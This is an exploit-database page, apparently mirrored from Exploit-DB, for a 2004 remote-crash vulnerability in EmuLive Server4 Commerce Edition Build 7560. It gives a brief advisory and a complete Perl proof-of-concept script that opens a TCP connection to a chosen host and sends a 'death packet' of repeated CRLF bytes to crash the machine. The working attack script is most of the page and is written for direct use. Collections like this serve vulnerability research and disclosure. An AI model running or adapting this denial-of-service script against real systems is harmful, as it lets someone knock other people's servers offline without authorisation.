header-logo
Suggest Exploit
vendor:
Server4 Commerce Edition
by:
Unknown
7.5
CVSS
HIGH
Remote crash
CWE
Product Name: Server4 Commerce Edition
Affected Version From: EmuLive Server4 Commerce Edition Build 7560
Affected Version To: EmuLive Server4 Commerce Edition Build 7560
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2004

EmuLive Server4 Commerce Edition Build 7560 Remote Crash

The EmuLive Server4 Commerce Edition Build 7560 is vulnerable to a remote crash when it receives a malformed request on TCP port 66. The crash is severe and causes the machine running the server to crash hard.

Mitigation:

Unknown
Source

Exploit-DB raw data:

#!/usr/bin/perl
##############################################
# EmuLive Server4 Commerce Edition Build 7560 
##############################################
# Remote crash proof of conecpt code. When the 
# machine running Server4 recieves a malformed
# request on TCP port 66 it crashes very hard!
##############################################
# GulfTech Security   http://www.gulftech.org
##############################################

use IO::Socket;

unless ($ARGV[0]) 
{ 
	die "usage: s4nomore.pl host port"
}

	printf("==========================================================\n",);
	printf(" EmuLive Server4 Commerce Edition Build 7560 Remote Crash \n",);
	printf("==========================================================\n",);


	my $host = $ARGV[0];
	my $port = $ARGV[1];


	my $dead = "\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A". #\r\n\r\n\r\n\r\n
			   "\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A". #\r\n\r\n\r\n\r\n
			   "\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A". #\r\n\r\n\r\n\r\n
			   "\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A"; #\r\n\r\n\r\n\r\n


	my $i = IO::Socket::INET->new( Proto => "tcp",
							       PeerAddr  => $host,
								   PeerPort  => $port,
							       Timeout   => '100',
							       Type      => SOCK_STREAM,
							      ) || die("Connect Error");

		printf("[*] Sending Death Packet To %s\n", $host);
		print $i $dead;	
		$i->autoflush(1);
		printf("[*] Host %s Should Now Be Dead\n", $host);
		printf("[*] Closing Connections And Exiting  \n");
		close $i;
		exit;

# milw0rm.com [2004-09-21]

Navigation

Suggest Exploit

Services By CQR